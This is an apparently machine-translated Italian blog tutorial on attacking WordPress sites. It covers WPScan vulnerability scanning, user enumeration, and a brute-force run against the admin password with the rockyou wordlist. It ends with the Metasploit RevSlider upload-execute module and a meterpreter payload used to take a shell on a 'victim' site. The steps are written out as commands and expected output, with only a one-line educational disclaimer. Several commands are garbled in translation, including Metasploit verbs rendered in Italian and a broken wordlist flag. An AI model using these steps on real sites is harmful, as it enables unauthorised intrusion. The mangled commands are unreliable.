Come hackerare un sito Web WordPress usando WPScan e Metasploit con Kali Linux

Condividi questo articolo:


In questo tutorial, ti mostrerò come utilizzare WPScan e Metasploit per hackerare facilmente un sito Web WordPress. Imparerai come scansionare i siti WordPress per potenziali vulnerabilità, sfruttare le vulnerabilità per possedere la vittima, enumerare gli utenti WordPress, account WordPress a forza bruta e caricare la famigerata shell meterpreter sul sistema di destinazione utilizzando Metasploit Framework.

Un utente malintenzionato può anche facilmente sfruttare le shell PHP che sono ampiamente disponibili e caricarle su siti WordPress di destinazione. Pertanto, ci sono vari modi per testare la sicurezza di un sito WordPress.

In breve, spiegherò molto bene quanto segue:

  • Come utilizzare WPScan per trovare vulnerabilità da sfruttare in modo efficace
  • Come pensare criticamente ed esaminare le potenziali vulnerabilità
  • Come sfruttare le vulnerabilità divulgate da WPScan
  • Come enumerare utenti / account di WordPress
  • Come forzare la forzatura della password dell’account amministratore di WordPress
  • Come utilizzare Metasploit per sfruttare una vulnerabilità del plug-in critico rilevata da WPScan
  • Come utilizzare un payload in Metasploit per sfruttare WordPress
    —————————-

NOTA: come sempre, questo articolo è solo a scopo didattico.

—————————-

Apri WPScan

È possibile aprire un terminale e digitare wpscan oppure

vai su Applicazioni> Analisi delle applicazioni Web> WPScan

Aggiorna il database delle vulnerabilità di WPScan.

La prima cosa da fare prima è assicurarsi che il database delle vulnerabilità di WPScan sia aggiornato.

Digitare il comando successivo nel terminale per aggiornare il database:

wpscan -update

Inizia la scansione del sito Web per vulnerabilità di WordPress / Plugin / Temi

Digita il comando successivo nel terminale per scansionare il sito Web del target alla ricerca di vulnerabilità potenzialmente sfruttabili:

wpscan —url tuosito.com

Come possiamo vedere, WPScan ha scoperto vari fatti sul sito Web del target, inclusi e non limitati a:

XMLRPC.php (XML-RPC Interface) è aperto allo sfruttamento come brute-force e pingback DDoS.
Identificata la versione principale di WordPress: 4.4.10
1 vulnerabilità di base di WordPress: Iniezione intestazione host in Reimpostazione password segnalata dal 4.4.10.
Identificato il tema e la versione di WordPress utilizzati.
Il rosso ! segno indica che un componente specifico di un sito è vulnerabile allo sfruttamento.

Come WPScan rivela che il sito ha:

Modulo di contatto vulnerabile con un bypass di sicurezza, RCE di caricamento file disponibile (riferimenti: WPVulnDB, SecurityFocus, CVE MITER, PacketStormSecurity)
Compositore visivo potenzialmente sfruttabile Più XSS non specificato
È importante notare che anche quando WPScan non è in grado di determinare una versione di un plug-in specifico, stamperà un elenco di tutte le potenziali vulnerabilità. È utile prendere il tempo di rivedere, visitare i siti di riferimento individualmente ed eseguire questi exploit per determinare se il sito di destinazione è vulnerabile o meno a loro. Solo perché non è possibile determinare una versione del plug-in, ciò non significa che il sito non sia vulnerabile.

È utile dedicare del tempo alla revisione delle vulnerabilità, visitare i siti di riferimento individualmente ed eseguire questi exploit per determinare se il sito di destinazione è vulnerabile o meno. Solo perché non è possibile determinare una versione del plug-in, ciò non significa che il sito non sia vulnerabile.

Siti di riferimento che è necessario utilizzare per condurre ricerche per potenziali vulnerabilità

https://wpvulndb.com
https://packetstormsecurity.com
https://www.exploit-db.com
https://cve.mitre.org
http://www.securityfocus.com

Il sito del target è vulnerabile a due exploit critici di Slider Revolution:

Inclusione di file locale
Caricamento Shell
Possiamo eseguire facilmente questi attacchi.

Ad esempio, possiamo usare Slider Revolution Upload Execute Exploit tramite Metasploit.

Metasploit ha già questo exploit pronto per l’uso per il tuo piacere.

Un’altra cosa prima di procedere con il Tutorial di Metasploit Framework:

Come enumerare utenti / account di WordPress

Lo strumento di enumerazione utente / account WordPress integrato in WPScan viene distribuito per ottenere un elenco di utenti WordPress registrati dal sito Web di destinazione.

L’enumerazione degli utenti è indispensabile quando un hacker deve ottenere l’accesso a un determinato target tramite brute forzando l’account amministratore di WordPress del target.

Lo strumento di enumerazione degli utenti WPScan eseguirà la scansione del sito di destinazione alla ricerca di autori e nomi utente di WordPress.

Distribuire il comando successivo per enumerare gli utenti di WordPress:

wpscan —url targetwordpressurl.com –enumerate u

Come possiamo vedere, lo strumento di enumerazione degli utenti di WPScan ha identificato:

Due account utente, in particolare il più importante: admin (Nome amministratore predefinito lasciato invariato)
admin è ancora usato.
Il secondo account può possedere i privilegi di amministratore, se necessario è in grado di forzare entrambi contemporaneamente
Come forzare la forzatura della password dell’account amministratore di WordPress

Digitare il comando successivo nel terminale per forzare la password per l’amministratore dell’utente:

wpscan –url targetwordpressurl.com –wordlist /usr/share/wordlists/rockyou.txt (sostituisci elenco di parole e posizione con il tuo

scelta) –username admin (nome utente del target) –threads 2 (sostituisci il numero di thread che desideri utilizzare)
Per una versione pulita senza quelle fastidiose parentesi che ho appena usato, ecco il comando:

wpscan —url targetwordpressurl.com – elenco di parole /usr/share/wordlists/rockyou.txt –username admin –threads 2
Alla fine, potresti vedere la password elencata nel terminale accanto all’ID di accesso.

Per altri articoli sulla forza bruta, leggi un altro articolo che ho scritto qui.

Avvia Metasploit Framework tramite il desktop Linux Distro

Cordiali saluti, anche se questa vulnerabilità del plug-in RevSlider è stata patchata, molti siti Web WordPress là fuori non hanno ancora aggiornato il loro plug-in RevSlider, il che li rende suscettibili di diventare di proprietà di 1337 hax0rs.

Per ulteriori informazioni sul modulo che stiamo per utilizzare, fai clic qui.

Digitare i comandi successivi nel terminale:

cerca revslider
usa exploit / unix / webapp / wp_revslider_upload_execute
mostra opzioni

Devi impostare l’URL del sito web del tuo target utilizzando il comando seguente:

imposta rhost 127.0.0.1/targetsiteurl.com (Sostituisci l’indirizzo IP con l’IP del sito o semplicemente sostituisci l’URL del sito di destinazione.)

E

Devi impostare il percorso di base dell’URI del tuo target per la sua applicazione WordPress usando il comando seguente:

imposta targeturi / wordpress (Sostituisci / wordpress con il percorso della singola directory se WordPress non è installato in /)

Usa un payload

 

Dobbiamo impostare un payload. Nella nostra dimostrazione, usiamo il noto payload del meterpreter per raggiungere il nostro obiettivo.

Digitare i seguenti comandi nel Terminale:

imposta payload php / meterpreter / bind_tcp
mostra opzioni


Assicurati che rhost sia per il modulo che per le opzioni di payload siano riempiti con l’indirizzo IP / URL del sito di destinazione.

È possibile verificare / confermare se l’obiettivo è vulnerabile digitando il comando “check” nel terminale.

Riceverai il messaggio di risposta: “L’obiettivo sembra essere vulnerabile”. Lo sappiamo già, ma solo per ricontrollare.

Ora per ottenere la shell meterpreter sul sistema del target, digita semplicemente il comando “exploit” nel terminale.

In caso di successo, nel terminale verranno visualizzati i seguenti messaggi:

“127.0.0.1 (Indirizzo IP del target sostituito) – Il nostro payload è su / wordpress / wp-content / plugins / revslider / temp / upload”
“127.0.0.1 (Indirizzo IP di destinazione sostituito) – Chiamata payload …”
“Eliminato oCDNSJ.php“
“Deleted ../revslider.zip“
Bene, abbiamo presentato con successo il nostro debole avversario.

Spero che questo tutorial ti sia piaciuto.

Fino alla prossima volta.

Saluti!

Sunny Hoi è un professionista canadese della sicurezza IT, blogger e alunno dell’Università di Toronto. Come consulente per la sicurezza e analista forense digitale, è attivamente impegnato nella ricerca tecnica e nello sviluppo. Sunny si distingue per la sua raffinatezza tecnica e capacità uniche. È anche caporedattore di 1337pwn.


Per ulteriori informazioni visita il sito: immagi.net

Condividi questo articolo: